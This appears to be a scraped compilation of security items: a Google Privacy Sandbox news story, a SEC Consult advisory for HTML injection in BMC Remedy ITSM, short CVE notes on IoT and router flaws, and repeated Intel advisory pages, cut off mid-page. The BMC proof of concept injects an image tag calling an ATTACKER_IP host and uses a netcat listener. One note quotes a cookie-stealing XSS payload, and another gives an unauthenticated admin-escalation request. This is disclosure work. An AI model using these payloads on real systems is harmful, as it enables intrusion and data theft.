Internet behemoth Google on Tuesday said it plans to roll out Privacy Sandbox for Android in beta to mobile devices running Android 13 starting early next year.
"The Privacy Sandbox Beta will be available for ad tech and app developers who wish to test the ads-related APIs as part of their solutions," the company said.
To that end, developers will need to complete an enrollment process in order

Internet behemoth Google on Tuesday said it plans to roll out Privacy Sandbox for Android in beta to mobile devices running Android 13 starting early next year.

"The Privacy Sandbox Beta will be available for ad tech and app developers who wish to test the ads-related APIs as part of their solutions," the company said.

To that end, developers will need to complete an enrollment process in order to utilize the ads-related APIs, including Topics, FLEDGE, and Attribution Reporting.

Topics, which replaced Federated Learning of Cohorts (FLoC) earlier this year, aims to categorize user interests under different "topics" based on their device web browsing history. These inferred interests are then shared with marketers to serve targeted ads.

FLEDGE and Attribution reporting, on the other hand, enable custom audience targeting and help measure ad conversions without relying on cross-party user identifiers, respectively.

Organizations can also request access for a limited number of devices to test the Beta, plus register any apps which will utilize the Privacy Sandbox APIs.

The development comes after the search and advertising giant expanded the initiative to include its mobile operating system in February 2022, and followed it up with a developer preview in May 2022.

Privacy Sandbox is an effort led by Google to create a set of web standards for websites to access user information without compromising on privacy. It aims to facilitate online advertising without resorting to invasive methods like third-party tracking cookies or fingerprinting.

That said, the company's plans to turn off third-party cookies in the Chrome web browser have been delayed twice, with the technology now expected to be phased out sometime in the second half of 2024.

To complicate matters further, the proposals have drawn criticism from rival browser vendors like Mozilla Firefox and developers of other Chromium-based browsers such as Brave, Opera, and Vivaldi, who have said the newer methods would cement "Google's position as a web monopolist."

DuckDuckGo, which blocks Privacy Sandbox through its Chrome browser extension as of May 2022, said Topics allows Google to surveil users' online activities and share that information with advertisers for behavioral targeting without their consent.

"This targeting, regardless of how it's done, enables manipulation (ex. exploiting personal vulnerabilities), discrimination (ex. people not seeing job opportunities based on personal profiles), and filter bubbles (ex. creating echo chambers that can divide people) that many people would like to avoid," the company noted.

Despite the pushback, Google said it's looking to engage with the broader ecosystem and gather "continued feedback as we enter this next phase of testing."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Google to Roll Out Privacy Sandbox Beta on Android 13 by Early 2023

BMC Remedy ITSM-Suite version 9.1.10 (20.02 in new versioning scheme) suffers from an html injection vulnerability.

SEC Consult Vulnerability Lab Security Advisory < 20221110-0 >  
=======================================================================  
               title: HTML Injection  
             product: BMC Remedy ITSM-Suite  
  vulnerable version: 9.1.10 (= 20.02 in new versioning scheme)  
       fixed version: 22.1  
          CVE number: CVE-2022-26088  
              impact: Low  
            homepage: https://www.bmc.com/it-solutions/remedy-itsm.html  
               found: 2021-08-11  
                  by: Daniel Hirschberger (Office Bochum)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Remedy IT Service Management Suite (Remedy ITSM Suite) and BMC Helix  
ITSM service provide out of-the-box IT Information Library (ITIL)  
service support functionality. Remedy ITSM Suite and BMC Helix ITSM  
service streamline and automate the processes around IT service desk,  
asset management, and change management operations. It also enables  
you to link your business services to your IT infrastructure to help  
you manage the impact of technology changes on business and business  
changes on technology — in real time and into the future. In addition,  
you can understand and optimize the user experience, balance current  
and future infrastructure investments, and view potential impact on  
the business by using a real-time service model."

Source: https://docs.bmc.com/docs/itsm91/home-608490971.html

Business recommendation:  
------------------------  
The vendor provides an updated version which should be installed immediately.

The vendor states that:  
 > We have done hardening in version 22.1.  
 > However, we do not agree with assigning the CVE to this vulnerability.  
 > As mentioned previously this is an informative vulnerability, and no real  
   impact is demonstrated.

Nevertheless, this can be used to trigger actions on internal services via CSRF or  
exfiltrate information.

Vulnerability overview/description:  
-----------------------------------  
1) HTML Injection (CVE-2022-26088)  
An authenticated attacker who can forward incidents per email is able to inject  
a limited set of HTML tags. This is accomplished by inserting arbitrary content  
into the "To:" field of the email. There is a filtering mechanism that prevents  
the injection of many HTML tags, for example <script>, and it also removes event  
handlers. An attacker is able to insert an image tag with an arbitrary src URL.

After sending the email, an entry is appended into the activity log of the  
incident which states that $USER has sent an email to <X> recipients. Upon  
clicking on the number <X>, the injected HTML code is loaded and executed.

By inserting an <img> with an arbitrary "src" attribute, an attacker can force  
the user's browser to make requests to his specified URL. This can be used to  
trigger actions on internal services via CSRF or exfiltrate information.

Proof of concept:  
-----------------  
1) HTML Injection (CVE-2022-26088)  
When an incident is viewed, there is a button which allows forwarding the  
incident by mail. After entering a TO address and the body of the email, it can  
be sent by clicking on the send button.

The HTML injection can be performed by intercepting this request and changing  
the 'Email.To.InternetEmail' parameter. The modified request is:

-------------------------------------------------------------------------------  
PUT /rest/incident/worknote/SOME_INCIDENT_ID HTTP/1.1  
Host: TARGET  
Cookie: […]  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: application/json, text/plain, */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/json;charset=utf-8  
X-Xsrf-Token: SOME_TOKEN  
Content-Length: ADAPT_AS_NEEDED  
Te: trailers  
Connection: close

{  
   "worknote": "pentest",  
   "access": true,  
   "Email.From.Person": {  
     "email": "SOME_SENDING_MAIL",  
     "fullName": "Pentest - SEC Consult",  
     "loginId": "USERNAME"  
   },  
   "Email.Subject": "SOME_SUBJECT",  
   "Email.Body": "test2",  
   "Email.To.InternetEmail": "<img src=http://ATTACKER_IP:8001/>a@example.test",  
   "workInfoType": 16000  
}  
-------------------------------------------------------------------------------

The parameter Email.To.InternetEmail contains the payload. In this case an  
image tag containing the IP of the attacker was inserted:  
"<img src=http://LOCAL_IP:8001/>a@example.test"  
The a@example.test is needed to pass the email validation step and example.test  
was used to prevent sending out real emails.

After this step, the information that $USER has sent an email to 1 recipient  
will be appended in the activity log of this incident.

Now we start a local netcat listener with the command  
$ nc -vnlp 8001

Now we click on the number '1' in the activity log and see that the browser  
issues a request to our 'netcat' instance.

This confirms that the browser tries to load the image from the specified URL.

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested:  
* 9.1.10 this corresponds to version 20.02 as stated at the following URL:  
https://community.bmc.com/s/news/aA33n000000CmmSCAS/remedy-version-mapping

Vendor contact timeline:  
------------------------  
2021-09-07: Contacting vendor through email (appsec@bmc.com).  
2021-09-28: Vendor states that they did not get the first email.  
2021-09-29: Resending the advisory to their renewed GPG key.  
2021-10-29: Fix pending, request to delay publication.  
2021-11-18: Vulnerability is fixed and the fix is being evaluated.  
2022-01-17: Asking for a status update.  
2022-01-17: Vulnerability is fixed, no scheduled release.  
2022-01-24: Tentative release on 2022-03-09; discussing impact 'best practice' vs 'low'.  
2022-02-24: Fixed in Smart-IT 22.1, release postponed.  
2022-03-30: Release postponed to May 2022.  
2022-04-20: Asking if the fixed version will be released in May.  
2022-05-17: Asking if the fixed version will be released in May.  
2022-05-23: Release rescheduled to end of June/July  
2022-08-04: Asking for status  
2022-08-05: Product was released  
2022-08-31: Asking for link to update  
2022-09-01: Vendor does not agree with getting a CVE assigned, impact is explained again  
2022-09-06: Vendor asks for final version of advisory  
2022-09-06: Asking vendor for a new GPG key because of expiry  
2022-09-07: Sending the final advisory to the vendor  
2022-09-12: Vendor will check the advisory and answer in 1 or 2 days  
2022-09-14: Vendor states that their application is not vulnerable to CSRF and  
             asks if other data could be leaked via the HTTP request  
2022-09-15: We clarify that their application does not seem to be vulnerable to  
             CSRF but the HTML injection allows CSRFing other applications in the intranet.  
             Also we did not have time to assess if other data besides User-Agent and the  
             client's IP can be leaked.  
2022-10-04: We request an update to the previous mail.  
2022-10-19: Vendor sticks to their own original impact analysis.  
2022-11-10: Public release of security advisory.

Solution:  
---------  
Upgrade to version 22.1 or later which can be downloaded at the vendor's page:  
https://www.bmc.com/support/resources/product-downloads.html

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Daniel Hirschberger / @2022

BMC Remedy ITSM-Suite 9.1.10 / 20.02 HTML Injection

Tenda AC1200 Router Model W15Ev2 V15.11.0.10(1576) was discovered to contain a stack overflow via the setWanPpoe function. This vulnerability allows attackers to cause a Denial of Service (DoS) via crafted overflow data.

CVE-2022-42060: Vulnerabilities in Tenda's W15Ev2 AC1200 Router

In Tenda AC1200 Router model W15Ev2 V15.11.0.10(1576), there exists a command injection vulnerability in the function formSetFixTools. This vulnerability allows attackers to run arbitrary commands on the server via the hostname parameter.

CVE-2022-40847: Vulnerabilities in Tenda's W15Ev2 AC1200 Router

Konker v2.3.9 was to discovered to contain a Cross-Site Request Forgery (CSRF).

**CVE-ID: CVE-2022-35613**

**Popular posts from this blog**

**CVE-ID: CVE-2022-35137**

DGIOT Lightweight industrial IoT v4.5.4 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities. The platform does not output encode JS payloads such as <script>alert(document.cookie)</script>. These are instances of stored XSS that can be abused to steal admin user cookies. References: https://owasp.org/www-community/attacks/xss/

**CVE-ID: CVE-2022-35135, CVE-2022-35136**

CVE-2022-35136:  Boodskap IoT Platform v4.4.9-02 allows attackers to make unauthenticated API requests. CVE-2022-35135:  Boodskap IoT Platform v4.4.9-02 allows attackers to escalate privileges  via a crafted request sent to /api/user/upsert/<uuid>.  The platform successfully processes API requests even without valid cookies.For example, the following request to update user profile is processed, even though the request does not have any cookie/api key. (Cookie header is blank in the request) Since API requests to the platform are not authenticated, a user can assign themselves an admin role, by sending a request to  http://192.168.72.157/api/user/upsert/<userid>  endpoint. HTTP Request: POST /api/user/upsert/8c34fa03- 706a-4dc7-b484-cd8e0c329c81 HTTP/1.1 Host: 192.168.72.157 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0 Accept: \*/\* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json X-Re

**CVE-ID: CVE-2022-31861**

Cross site Scripting (XSS) in ThingsBoard IoT Platform through 3.3.4.1 via a crafted value being sent to the audit logs. Patch details:  https://github.com/thingsboard/thingsboard/pull/7385 Audit logs help in establishing accountability of usage among various users of an application. However, if this functionality is not implemented securely, attackers can abuse the implementation flaws to launch attacks against application users. In this blog, we take a look at an XSS vulnerability in the audit logs feature of Thingsboard, an open-source IoT platform, and how it leads to account takeover of admin accounts. This vulnerability can be exploited by an existing lower privileged user of the platform. According to Thingsboard's documentation ( https://thingsboard.io/docs/pe/user-guide/rbac/ ), on the community edition, "a tenant administrator manages devices, dashboards, customers, and other entities that belong to a particular tenant". Each tenant has several customers and as

CVE-2022-35613: CVE-ID: CVE-2022-35613

Improper buffer restrictions in some Intel(R) XMM(TM) 7560 Modem software before version M2_7560_R_01.2146.00 may allow a privileged user to potentially enable escalation of privilege via physical access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® XMM™ 7560 Modem Software Advisory**

Intel ID:

INTEL-SA-00683

Advisory Category:

Software

Impact of vulnerability:

Escalation of Privilege, Denial of Service, Information Disclosure

Severity rating:

HIGH

Original release:

11/08/2022

Last revised:

11/08/2022

**Summary: **

Potential security vulnerabilities in some Intel® XMM™ 7560 Modem software may allow escalation of privilege.  Intel is releasing software updates to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID: CVE-2022-26513

Description: Out-of-bounds write in some Intel(R) XMM(TM) 7560 Modem software before version M2\_7560\_R\_01.2146.00 may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.

CVSS Base Score: 8.0 High

CVSS Vector: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:H

CVEID: CVE-2022-27874

Description: Improper authentication in some Intel(R) XMM(TM) 7560 Modem software before version M2\_7560\_R\_01.2146.00 may allow a privileged user to potentially enable escalation of privilege via physical access.

CVSS Base Score: 6.8 Medium

CVSS Vector: CVSS:3.1/AV:P/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H

CVEID: CVE-2022-28611

Description: Improper input validation in some Intel(R) XMM(TM) 7560 Modem software before version M2\_7560\_R\_01.2146.00 may allow a privileged user to potentially enable escalation of privilege via physical access.

CVSS Base Score: 6.8 Medium

CVSS Vector: CVSS:3.1/AV:P/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H

CVEID: CVE-2022-26369

Description: Out-of-bounds read in some Intel(R) XMM(TM) 7560 Modem software before version M2\_7560\_R\_01.2146.00 may allow a privileged user to potentially enable escalation of privilege via adjacent access.

CVSS Base Score: 6.2 Medium

CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

CVEID: CVE-2022-28126

Description: Improper input validation in some Intel(R) XMM(TM) 7560 Modem software before version M2\_7560\_R\_01.2146.00 may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.0 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H

CVEID: CVE-2022-26367

Description: Improper buffer restrictions in some Intel(R) XMM(TM) 7560 Modem software before version M2\_7560\_R\_01.2146.00 may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.0 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

CVEID: CVE-2022-26079

Description: Improper conditions check in some Intel(R) XMM(TM) 7560 Modem software before version M2\_7560\_R\_01.2146.00 may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.0 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H

CVEID: CVE-2022-27639

Description: Incomplete cleanup in some Intel(R) XMM(TM) 7560 Modem software before version M2\_7560\_R\_01.2146.00 may allow a privileged user to potentially enable escalation of privilege via adjacent access.

CVSS Base Score: 5.4 Medium

CVSS Vector: CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:N/I:N/A:H

CVEID: CVE-2022-26045

Description: Improper buffer restrictions in some Intel(R) XMM(TM) 7560 Modem software before version M2\_7560\_R\_01.2146.00 may allow a privileged user to potentially enable escalation of privilege via physical access.

CVSS Base Score: 3.3 Low

CVSS Vector: CVSS:3.1/AV:P/AC:H/PR:H/UI:N/S:C/C:N/I:L/A:L

**Affected Products:**

Intel® XMM™ 7560 Modem M.2 software for Windows or Linux before version M2\_7560\_R\_01.2146.00.

**Recommendations:**

Intel recommends that users of Intel® XMM™ 7560 Modem M.2 software for Windows or Linux update to the latest version provided by the system manufacturer that addresses these issues.

**Acknowledgements:**

These issues were found internally by Intel employee Bharats Chandra.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.  

**Revision History**

Revision

Date

Description

1.0

11/08/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-26045: INTEL-SA-00683

Improper input validation for some Intel(R) PROSet/Wireless WiFi, Intel vPro(R) CSME WiFi and Killer(TM) WiFi products may allow unauthenticated user to potentially enable denial of service via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® PROSet/Wireless WiFi, Intel vPro® CSME WiFi and Killer™ WiFi Advisory**

**Summary: **

A potential security vulnerability in some Intel® PROSet/Wireless WiFi, Intel vPro® CSME WiFi and Killer™ WiFi products may allow denial of service. Intel is releasing a firmware update to mitigate this potential vulnerability.

**Vulnerability Details:**

CVEID: CVE-2022-26047

Description: Improper input validation for some Intel(R) PROSet/Wireless WiFi, Intel vPro(R) CSME WiFi  and Killer(TM) WiFi products may allow unauthenticated user to potentially enable denial of service via local access.

CVSS Base Score: 4.3 Medium

CVSS Vector:  CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

**Affected Products:**

Intel® PROSet/Wireless WiFi firmware before version 22.140, Killer™ WiFi firmware before version 3.1122.3158 and UEFI version 2.2.14.22176.2.

**CVE ID**

**Affected Products**

**Affected OS**

CVE-2022-26047

Intel® Wi-Fi 6E AX411

Intel® Wi-Fi 6E AX211

Intel® Wi-Fi 6E AX210

Intel® Wi-Fi 6 AX201

Intel® Wi-Fi 6 AX200

Windows 10 & 11

Linux

Chrome OS

UEFI

CSME

CVE-2022-26047

Killer™ Wi-Fi 6E AX1690

Killer™ Wi-Fi 6E AX1675

Killer™ Wi-Fi 6 AX1650

Windows 10 & 11

**Recommendations:**

**Windows:**

Intel recommends updating Intel® PROSet/Wireless WiFi software to version 22.140 or later.

Updates are available for download at this location:

https://www.intel.com/content/www/us/en/download/19351/windows-10-and-windows-11-wi-fi-drivers-for-intel-wireless-adapters.html

Intel recommends updating Killer™ WiFi software to version 3.1122.3158 or later.

Updates for Killer™ products are available for download at this location:

https://www.intel.com/content/www/us/en/download/19779/intel-killer-performance-suite.html?wapkw=killer

**UEFI:**

Intel recommends updating Intel® PROSet/Wireless WiFi UEFI drivers to version 2.2.14.22176 or later.

Please contact your OEM support group to obtain the correct driver version.

**Chrome OS:**

Intel® PROSet/Wireless WiFi drivers to mitigate this vulnerability will be up streamed to Chromium by November 08, 2022.

For any Google Chrome OS solution and schedule, please contact Google directly.

**Linux OS:**

Intel® PROSet/Wireless WiFi drivers to mitigate this vulnerability will be up streamed by November 08, 2022.

Consult the regular open-source channels to obtain this update.

**Recommendation for Intel vPRO® CSME WiFi products:**

Intel recommends updating Intel vPRO® CSME WiFi products to the following versions or newer.

**Platform**

**CSME Version**

**Device**

12th Generation Intel® Core Processor

16.1.25.1885v2

Intel® Wi-Fi 6E AX211

Intel® Wi-Fi 6E AX210

12th Generation Intel® Core Processor – Performance cores

16.1.25.1865v6.1

Intel® Wi-Fi 6E AX211

Intel® Wi-Fi 6E AX210

11th Generation Intel® Core Processor

15.0.42.2235

Intel® Wi-Fi 6 AX210

Intel® Wi-Fi 6 AX201

Intel® Wi-Fi 6 AX200

10th Generation Intel® Core Processor

14.1.67.2046

Intel® Wi-Fi 6E AX210

Intel® Wi-Fi 6 AX201

ntel® Wi-Fi 6 AX200

9th Generation Intel® Core Processor

12.0.92.2145v3

Intel® Wi-Fi 6 AX200

8th Generation Intel® Core Processor

12.0.92.2145v3

Intel® Wi-Fi 6 AX200

Intel recommends that users of Intel® vPRO® CSME WiFi products update to the latest version provided by the system manufacturer that addresses these issues.  

**Acknowledgements:**

The following issue was found internally by an Intel employee.  Intel would like to thank Julien Lenoir.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/08/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-26047: INTEL-SA-00699

Improper authentication in subsystem for Intel(R) AMT before versions 11.8.93, 11.22.93, 11.12.93, 12.0.92, 14.1.67, 15.0.42, 16.1.25 may allow a privileged user to potentially enable escalation of privilege via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**2022.3 IPU - Intel® Chipset Firmware Advisory**

Intel ID:

INTEL-SA-00610

Advisory Category:

Firmware

Impact of vulnerability:

Escalation of Privilege, Denial of Service

Severity rating:

HIGH

Original release:

11/08/2022

Last revised:

11/08/2022

**Summary: **

Potential security vulnerabilities in some Intel® Chipset Firmware in Intel® Converged Security and Manageability Engine (CSME), Intel® Active Management Technology (AMT) and Intel® Server Platform Services (SPS) may allow escalation of privilege or denial of service.  Intel is releasing firmware updates to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID: CVE-2022-26845

Description: Improper authentication in firmware for Intel(R) AMT before versions 11.8.93, 11.22.93, 11.12.93, 12.0.92, 14.1.67, 15.0.42, 16.1.25 may allow an unauthenticated user to potentially enable escalation of privilege via network access.

CVSS Base Score: 8.7 High

CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N

CVEID: CVE-2022-27497

Description: Null pointer dereference in firmware for Intel(R) AMT before version 11.8.93, 11.22.93, 11.12.93, 12.0.92, 14.1.67, 15.0.42, 16.1.25 may allow an unauthenticated user to potentially enable denial of service via network access.

CVSS Base Score: 8.6 High

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

CVEID: CVE-2022-29893

Description: Improper authentication in firmware for Intel(R) AMT before versions 11.8.93, 11.22.93, 11.12.93, 12.0.92, 14.1.67, 15.0.42, 16.1.25 may allow an authenticated user to potentially enable escalation of privilege via network access.

CVSS Base Score: 8.1 High

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

CVEID: CVE-2021-33159

Description: Improper authentication in subsystem for Intel(R) AMT before versions 11.8.93, 11.22.93, 11.12.93, 12.0.92, 14.1.67, 15.0.42, 16.1.25 may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score:  7.4 High

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:N/I:H/A:H

CVEID: CVE-2022-29466

Description: Improper input validation in firmware for Intel(R) SPS before version SPS\_E3\_04.01.04.700.0 may allow an authenticated user to potentially enable denial of service via local access.

CVSS Base Score: 7.3 High

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H

CVEID: CVE-2022-29515

Description: Missing release of memory after effective lifetime in firmware for Intel(R) SPS before versions SPS\_E3\_06.00.03.035.0 may allow a privileged user to potentially enable denial of service via local access.

CVSS Base Score: 6.0 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H

**Affected Products:**

Intel® CSME before versions 11.8.93, 11.22.93, 11.12.93, 12.0.92, 14.1.67, 15.0.42, 16.1.25.

Intel® AMT before versions 11.8.93, 11.22.93, 12.0.92, 14.1.67, 15.0.42, 16.0.

Intel® SPS before versions SPS\_E3\_04.01.04.700.0, SPS\_E3\_06.00.03.035.0.

**Recommendations:**

Intel recommends that users of Intel® CSME, Intel® AMT and Intel® SPS update to the latest version provided by the system manufacturer that addresses these issues.

**Acknowledgements:**

These issues were found internally by Intel employees.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/08/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2021-33159: INTEL-SA-00610

Time-of-check time-of-use race condition in the BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
